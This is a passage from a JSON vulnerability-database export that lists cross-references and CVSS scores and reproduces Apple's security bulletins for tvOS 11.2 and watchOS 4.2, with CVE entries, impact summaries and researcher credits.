"SUSE_SU-2018-0031-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-0069-1.NASL", "SUSE_SU-2018-0113-1.NASL", "SUSE_SU-2018-0114-1.NASL", "SUSE_SU-2018-0115-1.NASL", "SUSE_SU-2018-0131-1.NASL", 
"SUSE_SU-2018-0171-1.NASL", "SUSE_SU-2018-0219-1.NASL", "SUSE_SU-2018-0438-1.NASL", "SUSE_SU-2018-0472-1.NASL", "SUSE_SU-2018-0555-1.NASL", "SUSE_SU-2018-0601-1.NASL", "SUSE_SU-2018-0609-1.NASL", "SUSE_SU-2018-0638-1.NASL", "SUSE_SU-2018-1177-1.NASL", "SUSE_SU-2018-1181-1.NASL", "SUSE_SU-2018-1184-1.NASL", "SUSE_SU-2018-1202-1.NASL", "SUSE_SU-2018-1203-1.NASL", "SUSE_SU-2018-1216-1.NASL", "UBNT_UNIFI_KRACK.NASL", "UBUNTU_USN-3505-1.NASL", "UBUNTU_USN-3514-1.NASL", "UBUNTU_USN-3516-1.NASL", "UBUNTU_USN-3522-1.NASL", "UBUNTU_USN-3522-2.NASL", "UBUNTU_USN-3522-3.NASL", "UBUNTU_USN-3522-4.NASL", "UBUNTU_USN-3523-1.NASL", "UBUNTU_USN-3523-2.NASL", "UBUNTU_USN-3524-1.NASL", "UBUNTU_USN-3540-1.NASL", "UBUNTU_USN-3540-2.NASL", "UBUNTU_USN-3541-1.NASL", "UBUNTU_USN-3541-2.NASL", "UBUNTU_USN-3551-1.NASL", "UBUNTU_USN-3583-1.NASL", "VIRTUOZZO_VZA-2018-002.NASL", "VIRTUOZZO_VZA-2018-003.NASL", "VIRTUOZZO_VZA-2018-006.NASL", "VIRTUOZZO_VZA-2018-029.NASL", "VIRTUOZZO_VZLSA-2017-2907.NASL", "VMWARE_VCENTER_VMSA-2018-0007.NASL", "XEN_SERVER_XSA-254.NASL"]}, {"type": "nvidia", "idList": ["NVIDIA:4601", "NVIDIA:4610", "NVIDIA:4611", "NVIDIA:4613", "NVIDIA:4614", "NVIDIA:4616", "NVIDIA:4617"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140432", "OPENVAS:1361412562310703999", "OPENVAS:1361412562310704078", "OPENVAS:1361412562310704082", "OPENVAS:1361412562310704120", "OPENVAS:1361412562310811865", "OPENVAS:1361412562310811921", "OPENVAS:1361412562310811925", "OPENVAS:1361412562310811927", "OPENVAS:1361412562310811959", "OPENVAS:1361412562310812016", "OPENVAS:1361412562310812022", "OPENVAS:1361412562310812026", "OPENVAS:1361412562310812258", "OPENVAS:1361412562310812284", "OPENVAS:1361412562310812285", "OPENVAS:1361412562310812289", "OPENVAS:1361412562310812290", "OPENVAS:1361412562310812291", "OPENVAS:1361412562310812292", "OPENVAS:1361412562310812293", "OPENVAS:1361412562310812294", "OPENVAS:1361412562310812295", "OPENVAS:1361412562310812296", 
"OPENVAS:1361412562310812384", "OPENVAS:1361412562310812386", "OPENVAS:1361412562310812397", "OPENVAS:1361412562310812398", "OPENVAS:1361412562310812400", "OPENVAS:1361412562310812401", "OPENVAS:1361412562310812408", "OPENVAS:1361412562310812662", "OPENVAS:1361412562310812740", "OPENVAS:1361412562310843392", "OPENVAS:1361412562310843405", "OPENVAS:1361412562310843406", "OPENVAS:1361412562310843409", "OPENVAS:1361412562310843410", "OPENVAS:1361412562310843412", "OPENVAS:1361412562310843413", "OPENVAS:1361412562310843414", "OPENVAS:1361412562310843415", "OPENVAS:1361412562310843418", "OPENVAS:1361412562310843423", "OPENVAS:1361412562310843424", "OPENVAS:1361412562310843427", "OPENVAS:1361412562310843429", "OPENVAS:1361412562310843437", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310851654", "OPENVAS:1361412562310851677", "OPENVAS:1361412562310851678", "OPENVAS:1361412562310851693", "OPENVAS:1361412562310851704", "OPENVAS:1361412562310851742", "OPENVAS:1361412562310873647", "OPENVAS:1361412562310873667", "OPENVAS:1361412562310873699", "OPENVAS:1361412562310873957", "OPENVAS:1361412562310873984", "OPENVAS:1361412562310874059", "OPENVAS:1361412562310874088", "OPENVAS:1361412562310882822", "OPENVAS:1361412562310891150", "OPENVAS:1361412562310891232"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018-3678067"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2907", "ELSA-2018-0007", "ELSA-2018-0008", "ELSA-2018-0169", "ELSA-2018-0292", "ELSA-2018-1319", "ELSA-2018-4006", "ELSA-2018-4011", "ELSA-2018-4012", "ELSA-2018-4021", "ELSA-2018-4025", "ELSA-2018-4071"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145363", "PACKETSTORM:145364", "PACKETSTORM:145876", "PACKETSTORM:153148"]}, {"type": "paloalto", "idList": ["PAN-SA-2018-0001"]}, {"type": "photon", "idList": ["PHSA-2018-0010", "PHSA-2018-1.0-0097"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:02EAB5AF6104A4960F7E3B105CD50FA1", "QUALYSBLOG:3ACE52E54FF5FE3EF1B0FC328181FA66", 
"QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:BD020D07BF02B0790C62701D997BFD4D", "QUALYSBLOG:C9F2432F760D960CF69CDC55D87263A8", "QUALYSBLOG:D893D4DFB7141FDAD0BE869440074392", "QUALYSBLOG:E761CF659F35F9F5C29FB50D76B98C3E", "QUALYSBLOG:F7C32BA5E6651A8CE3584BB84A88A0C0", "QUALYSBLOG:F8AA5B21D90BCDD30391A24D6FD47892"]}, {"type": "redhat", "idList": ["RHSA-2017:2911"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5754", "RH:CVE-2018-19965"]}, {"type": "securelist", "idList": ["SECURELIST:7CF4DDEB1B5407DAA24EC25BAA7A9654"]}, {"type": "seebug", "idList": ["SSV:96986", "SSV:96989", "SSV:96990", "SSV:96991", "SSV:97059", "SSV:97093"]}, {"type": "slackware", "idList": ["SSA-2017-291-02", "SSA-2018-016-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2755-1", "OPENSUSE-SU-2017:3144-1", "OPENSUSE-SU-2018:0022-1", "OPENSUSE-SU-2018:0023-1", "OPENSUSE-SU-2018:0326-1", "OPENSUSE-SU-2018:0459-1", "OPENSUSE-SU-2018:1274-1", "SUSE-SU-2017:2745-1", "SUSE-SU-2017:2752-1", "SUSE-SU-2017:3103-1", "SUSE-SU-2017:3106-1", "SUSE-SU-2017:3116-1", "SUSE-SU-2017:3117-1", "SUSE-SU-2017:3118-1", "SUSE-SU-2017:3119-1", "SUSE-SU-2017:3120-1", "SUSE-SU-2017:3121-1", "SUSE-SU-2017:3122-1", "SUSE-SU-2017:3123-1", "SUSE-SU-2017:3124-1", "SUSE-SU-2017:3125-1", "SUSE-SU-2017:3126-1", "SUSE-SU-2017:3127-1", "SUSE-SU-2017:3128-1", "SUSE-SU-2017:3129-1", "SUSE-SU-2017:3130-1", "SUSE-SU-2017:3131-1", "SUSE-SU-2017:3132-1", "SUSE-SU-2017:3134-1", "SUSE-SU-2017:3136-1", "SUSE-SU-2017:3139-1", "SUSE-SU-2017:3145-1", "SUSE-SU-2017:3146-1", "SUSE-SU-2017:3147-1", "SUSE-SU-2017:3148-1", "SUSE-SU-2017:3149-1", "SUSE-SU-2017:3150-1", "SUSE-SU-2017:3151-1", "SUSE-SU-2017:3152-1", "SUSE-SU-2017:3153-1", "SUSE-SU-2017:3154-1", "SUSE-SU-2017:3156-1", "SUSE-SU-2017:3157-1", "SUSE-SU-2017:3158-1", "SUSE-SU-2017:3159-1", "SUSE-SU-2017:3160-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2017:3267-1", "SUSE-SU-2018:0010-1", "SUSE-SU-2018:0011-1", 
"SUSE-SU-2018:0012-1", "SUSE-SU-2018:0031-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:0069-1", "SUSE-SU-2018:0113-1", "SUSE-SU-2018:0114-1", "SUSE-SU-2018:0115-1", "SUSE-SU-2018:0131-1", "SUSE-SU-2018:0171-1", "SUSE-SU-2018:0180-1", "SUSE-SU-2018:0213-1", "SUSE-SU-2018:0219-1", "SUSE-SU-2018:0438-1", "SUSE-SU-2018:0472-1", "SUSE-SU-2018:0555-1", "SUSE-SU-2018:0601-1", "SUSE-SU-2018:0609-1", "SUSE-SU-2018:0638-1", "SUSE-SU-2018:1177-1", "SUSE-SU-2018:1181-1", "SUSE-SU-2018:1184-1", "SUSE-SU-2018:1202-1", "SUSE-SU-2018:1203-1", "SUSE-SU-2018:1216-1"]}, {"type": "symantec", "idList": ["SMNTC-1426"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6AF8BBB020A686E442B50095CA9B7A36"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:37F5AF86E0886FC0FBDCCE15A1236586"]}, {"type": "thn", "idList": ["THN:29EC2E0BD61CF15B2E756ECA04EDFF50", "THN:58CFE19533148E77597FE0AC59963145", "THN:788E9312DDA39D9A09855DF379A0FD4D", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2"]}, {"type": "threatpost", "idList": ["THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:590758261828FF8DBC9F74588FAD3DE5", "THREATPOST:6C364316788D445329E5596C5108A157", "THREATPOST:7458AE86ECA810D873D5D35916A93D9F", "THREATPOST:CE89F855271AB3AE3CE8B5B0C141CDC2", "THREATPOST:DB0542CFA474B0D9C91032709EDE296D", "THREATPOST:E454192F36C2E44BAE14AB9B62BE28DB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "ubuntu", "idList": ["USN-3505-1", "USN-3514-1", "USN-3516-1", "USN-3522-1", "USN-3522-4", "USN-3523-2", "USN-3524-1", "USN-3524-2", "USN-3541-2", "USN-3551-1", "USN-3597-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-7153", "UB:CVE-2017-7160"]}, {"type": "virtuozzo", "idList": ["VZA-2018-001", "VZA-2018-002", "VZA-2018-003", "VZA-2018-006", "VZA-2018-028", "VZA-2018-029"]}, {"type": "vmware", "idList": ["VMSA-2018-0007.6"]}, {"type": "xen", "idList": ["XSA-254"]}, {"type": "zdi", "idList": ["ZDI-18-146", "ZDI-18-147", "ZDI-18-148", "ZDI-18-149", "ZDI-18-150", 
"ZDI-18-151", "ZDI-18-152", "ZDI-18-153", "ZDI-18-154", "ZDI-18-155", "ZDI-18-156"]}, {"type": "zdt", "idList": ["1337DAY-ID-29198", "1337DAY-ID-29200", "1337DAY-ID-29202", "1337DAY-ID-29935", "1337DAY-ID-32828"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "tvos", "version": 11}]}, "vulnersScore": 0.7}, "affectedSoftware": [{"name": "tvos", "operator": "lt", "version": "11.2"}], "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "_state": {"dependencies": 1659994789, "score": 1659984068, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "a43e2709674cd9f47038dafdcc4f1804"}}
{"apple": [{"lastseen": "2021-11-10T17:00:39", "description": "# About the security content of tvOS 11.2\n\nThis document describes the security content of tvOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An 
application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of 
information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google 
Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. 
This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-04T00:00:00", "type": "apple", "title": "About the security content of tvOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-04T00:00:00", "id": "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "href": "https://support.apple.com/kb/HT208327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of watchOS 4.2\n\nThis document 
describes the security content of watchOS 4.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race 
condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. 
This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with 
Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. 
This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-05T00:00:00", "type": "apple", "title": "About the security content of watchOS 4.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 